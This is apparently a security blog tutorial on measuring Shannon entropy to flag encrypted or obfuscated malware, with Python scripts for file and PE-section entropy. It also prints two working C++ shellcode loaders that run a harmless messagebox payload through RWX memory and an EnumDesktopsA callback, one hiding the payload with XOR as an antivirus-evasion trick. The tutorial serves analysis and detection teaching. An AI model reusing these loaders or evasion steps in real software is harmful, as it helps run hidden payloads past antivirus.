Malware analysis: part 6. Shannon entropy. Simple python script.
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on Shannon entropy. How to use it for malware analysis in practice.
entropy
Simply said, Shannon entropy is the quantity of information included inside a message, in communication terminology. Entropy is a measure of the unpredictability of the file’s data. The Shannon entropy is named after the famous mathematician Shannon Claude.
entropy and malwares
Now let me unfold a relationship between malwares and entropy. Malware authors are clever and advance and they do many tactics and tricks to hide malware from AV engines. As you know from my previous posts, it’s usually something like payload encryption or function call obfuscation. But at the same time as author is compressing the data as well as inserting some harmful code in the original file author is lowering the unpredictability of data therefore raising the entropy and here we can catch the file based on the entropy value. So, the greater the entropy, the more likely the data is obfuscated or encrypted, and the more probable the file is malicious.
practical examples
So how do you calculate Shannon’s entropy?
which can represent as:
i.e.
is a well known identity of the logarithm.
means “The entropy of data X.”.
The right hand of formula represents a summation that sums up:
This is the most important part of the equation, because this is what assigns higher numbers to rarer events and lower numbers to common events. represents the proportion of each unique character in the input .
In the Python language it is looks like this:
import math
def shannon_entropy(data):
# 256 different possible values
possible = dict(((chr(x), 0) for x in range(0, 256)))
for byte in data:
possible[chr(byte)] +=1
data_len = len(data)
entropy = 0.0
# compute
for i in possible:
if possible[i] == 0:
continue
p = float(possible[i] / data_len)
entropy -= p * math.log(p, 2)
return entropy
Let’s go to create script which calculate Shannon entropy of PE file’s sections. Let’s start with a simpler problem. First of all, for simplicity, let’s calculate Shannon entropy for binary files (entropy.py
):
import argparse
import math
def shannon_entropy(data):
# 256 different possible values
possible = dict(((chr(x), 0) for x in range(0, 256)))
for byte in data:
possible[chr(byte)] +=1
data_len = len(data)
entropy = 0.0
# compute
for i in possible:
if possible[i] == 0:
continue
p = float(possible[i] / data_len)
entropy -= p * math.log(p, 2)
return entropy
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-f','--file', required = True, help = "target file")
args = vars(parser.parse_args())
target_file = args['file']
with open(target_file, 'rb') as f:
data = f.read()
if data:
entropy = shannon_entropy(data)
print(entropy)
As you can see, everything is simple. Just read binary file and calculate Shannon entropy.
demo 1
Let’s say we have information. For simplicity, as usually meow-meow
messagebox payload is used by me.
Run:
python3 entropy -f ./meow.bin
How will this value change if this binary file is encrypted?
Let’s start with XOR
encryption. Create simple script (xor.py
):
import argparse
## XOR function to encrypt data
def xor(data, key):
key = str(key)
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
## encrypting
def xor_encrypt(data, key):
ciphertext = xor(data, key)
ciphertext_str = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
print (ciphertext_str)
return ciphertext
if __name__ == "__main__":
# key for encrypt/decrypt
my_secret_key = "mysupersecretkey"
parser = argparse.ArgumentParser()
parser.add_argument('-f','--file', required = True, help = "target file")
args = vars(parser.parse_args())
target_file = args['file']
with open(target_file, 'rb') as f:
data = f.read()
if data:
# encrypted
ciphertext = xor_encrypt(data, my_secret_key)
with open("xor.bin", "wb") as result:
result.write(ciphertext.encode())
As you can see, just xor binary file and save it as xor.bin
. Let’s check:
python3 xor.py -f ./meow.bin
python3 entropy -f ./xor.bin
As you can see, entropy is increased from 5.75
to 6.15
.
What about AES
encryption? Create another script (aes.py
):
# AES encryption
import argparse
import hashlib
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad
def aes_encrypt(data, key):
k = hashlib.sha256(key).digest()
iv = 16 * '\x00'
cipher = AES.new(k, AES.MODE_CBC, iv.encode("UTF-8"))
ciphertext = cipher.encrypt(pad(data, AES.block_size))
return ciphertext
if __name__ == "__main__":
# key for encrypt/decrypt
my_secret_key = get_random_bytes(16)
parser = argparse.ArgumentParser()
parser.add_argument('-f','--file', required = True, help = "target file")
args = vars(parser.parse_args())
target_file = args['file']
with open(target_file, 'rb') as f:
data = f.read()
if data:
# encrypted
ciphertext = aes_encrypt(data, my_secret_key)
with open("aes.bin", "wb") as result:
result.write(ciphertext)
It’s also pretty simple: create AES
-encrypted binary aes.bin
as result. Let’s check:
python3 aes.py -f ./meow.bin
python3 entropy -f ./aes.bin
As you can see, for AES
encryption, entropy is increased from 5.75
to 7.18
.
Now i modify my script enropy.py
to calculate shannon entropy for sections of pe file:
import argparse
import math
import pefile
def shannon_entropy(data):
# 256 different possible values
possible = dict(((chr(x), 0) for x in range(0, 256)))
for byte in data:
possible[chr(byte)] +=1
data_len = len(data)
entropy = 0.0
# compute
for i in possible:
if possible[i] == 0:
continue
p = float(possible[i] / data_len)
entropy -= p * math.log(p, 2)
return entropy
def sections_entropy(path):
pe = pefile.PE(path)
for section in pe.sections[:3]:
print(section.Name.decode('utf-8'))
print("\tvirtual address: " + hex(section.VirtualAddress))
print("\tvirtual size: " + hex(section.Misc_VirtualSize))
print("\traw size: " + hex(section.SizeOfRawData))
print ("\tentropy: " + str(shannon_entropy(section.get_data())))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-f','--file', required = True, help = "target file")
args = vars(parser.parse_args())
target_file = args['file']
with open(target_file, 'rb') as f:
sections_entropy(target_file)
For simplicity and demonstration purposes this calculate and print just first 3 sections.
demo 2
As an sample file I used one of my malware from this post:
/*
* hack.cpp - run shellcode via EnumDesktopA. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>
unsigned char my_payload[] =
// 64-bit meow-meow messagebox
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int main(int argc, char* argv[]) {
LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, my_payload, sizeof(my_payload));
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
Run updated script:
python3 entropy -f ./hack.exe
I uploaded this file to VirusTotal, which also calculate sections’ entropy:
As you can see our script is worked perfectly!
I wonder what the Shannon entropy will show if we use one of our AV evasion tricks?
I just create XOR
- encrypted payload from meow.bin
for simplicity:
Also add decryption function (hack2.cpp
):
/*
* hack.cpp - run shellcode via EnumDesktopA. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html
*/
#include <windows.h>
unsigned char my_payload[] =
// 64-bit meow-meow messagebox encrypted
{ 0x91, 0x31, 0xf2, 0x91, 0x80, 0x9a, 0x8d, 0x8c, 0x8d, 0xb3, 0x72,
0x65, 0x74, 0x2a, 0x34, 0x38, 0x3d, 0x2b, 0x22, 0x23, 0x38, 0x54,
0xa0, 0x16, 0x2d, 0xe8, 0x20, 0x5, 0x4a, 0x23, 0xee, 0x2b, 0x75,
0x47, 0x3b, 0xfe, 0x22, 0x45, 0x4c, 0x3b, 0xee, 0x11, 0x22, 0x5b,
0x3c, 0x64, 0xd2, 0x33, 0x27, 0x34, 0x42, 0xbc, 0x38, 0x54, 0xb2,
0xdf, 0x59, 0x2, 0xe, 0x67, 0x58, 0x4b, 0x24, 0xb8, 0xa4, 0x74,
0x32, 0x74, 0xb1, 0x87, 0x9f, 0x21, 0x24, 0x32, 0x4c, 0x2d, 0xff,
0x39, 0x45, 0x47, 0xe6, 0x3b, 0x4f, 0x3d, 0x71, 0xb5, 0x4c, 0xf8,
0xe5, 0xeb, 0x72, 0x65, 0x74, 0x23, 0xe0, 0xb9, 0x19, 0x16, 0x3b,
0x74, 0xa0, 0x35, 0x4c, 0xf8, 0x2d, 0x7b, 0x4c, 0x21, 0xff, 0x2b,
0x45, 0x30, 0x6c, 0xa9, 0x90, 0x29, 0x38, 0x9a, 0xbb, 0x4d, 0x24,
0xe8, 0x46, 0xed, 0x3c, 0x6a, 0xb3, 0x34, 0x5c, 0xb0, 0x3b, 0x44,
0xb0, 0xc9, 0x33, 0xb2, 0xac, 0x6e, 0x33, 0x64, 0xb5, 0x53, 0x85,
0xc, 0x9c, 0x47, 0x3f, 0x76, 0x3c, 0x41, 0x7a, 0x36, 0x5c, 0xb2,
0x7, 0xb3, 0x2c, 0x55, 0x21, 0xf2, 0x2d, 0x5d, 0x3a, 0x74, 0xa0,
0x3, 0x4c, 0x32, 0xee, 0x6f, 0x3a, 0x5b, 0x30, 0xe0, 0x25, 0x65,
0x24, 0x78, 0xa3, 0x4b, 0x31, 0xee, 0x76, 0xfb, 0x2d, 0x62, 0xa2,
0x24, 0x2c, 0x2a, 0x3d, 0x27, 0x34, 0x23, 0x32, 0x2d, 0x31, 0x3c,
0x33, 0x29, 0x2d, 0xe0, 0x9e, 0x45, 0x35, 0x39, 0x9a, 0x99, 0x35,
0x38, 0x2a, 0x2f, 0x4e, 0x2d, 0xf9, 0x61, 0x8c, 0x2a, 0x8d, 0x9a,
0x8b, 0x36, 0x2c, 0xbe, 0xac, 0x79, 0x73, 0x75, 0x70, 0x5b, 0x3a,
0xfe, 0xf0, 0x9d, 0x72, 0x65, 0x74, 0x55, 0x29, 0xf4, 0xe8, 0x70,
0x72, 0x75, 0x70, 0x2d, 0x43, 0xba, 0x24, 0xd9, 0x37, 0xe6, 0x22,
0x6c, 0x9a, 0xac, 0x25, 0x48, 0xba, 0x34, 0xca, 0x95, 0xc7, 0xd1,
0x33, 0x9c, 0xa7, 0x28, 0x11, 0x4, 0x12, 0x54, 0x0, 0x1c, 0x1c,
0x2, 0x51, 0x65, 0x4f, 0x2d, 0x4b, 0x4d, 0x2c, 0x58, 0x74 };
// key for XOR decrypt
char my_secret_key[] = "mysupersecretkey";
// decrypt deXOR function
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
int main(int argc, char* argv[]) {
LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// decrypt (deXOR) the payload
XOR((char *) my_payload, sizeof(my_payload), my_secret_key, sizeof(my_secret_key));
RtlMoveMemory(mem, my_payload, sizeof(my_payload));
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
demo 3
Let’s go to see in action. Compile our new “malware”:
x86_64-w64-mingw32-g++ -O2 hack2.cpp -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
and calculate entropy:
python3 entropy.py -f ./hack2.exe
As you can see, in this case, Shannon entropy is increased from 5.95
to 6.02
. Perfect! =^..^=
conclusion
As you can see, sometimes entropy can help predict whether a file is malicious or not. It is used in many malware analysis programs.
I hope this post will be helpful for blue teamers and red teamers for better understanding theirs “cat =^..^= and mouse <:3 )~~~” game (or war?).
This is a practical case for educational purposes only.
XOR cipher
AES
AV engines evasion: part 1
Shannon entropy
source code in github
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine